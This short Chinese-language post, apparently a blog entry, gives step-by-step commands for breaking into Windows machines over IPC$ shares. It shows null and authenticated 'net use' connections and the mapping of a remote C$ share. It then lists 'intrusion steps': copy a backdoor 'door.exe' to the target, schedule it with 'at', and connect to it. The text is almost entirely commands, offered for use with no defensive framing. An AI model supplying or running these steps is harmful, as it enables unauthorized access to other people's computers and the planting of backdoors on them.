windows ipc$ 入侵命令
命令说明:
1)建立空连接:
|
1 |
net use \\IP\ipc$ "" /user:"" |
2)建立非空连接:
|
1 |
net use \\IP\ipc$ "用户名" /user:"密码" |
3)映射默认共享:
|
1 |
net use z: \\IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘 |
4)删除一个ipc$连接
|
1 |
net use \\IP\ipc$ /del |
5)删除共享映射
|
1 2 3 |
net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 |
详细入侵步骤:
|
1 2 3 4 5 6 7 8 9 |
1. C:\>net use \\110.110.110.110\IPC$ "密码" /user:"用户名" 2. C:\>copy door.exe \\110.110.110.110\c$ 复制后门程序到 C 盘根目录 3. C:\>net time \\110.110.110.110 查看远程主机的当前系统时间 4. C:\>at \\110.110.110.110 11:11 door.exe 定时在远程主机执行后门程序,要大于当前的远程主机时间 ,不然就是在第二天的这个时间执行 5. C:\>at \\110.110.110.110 查看远程主机当前的计划任务ID |
执行成功后,就可以使用客户端连接后门文件
No Comments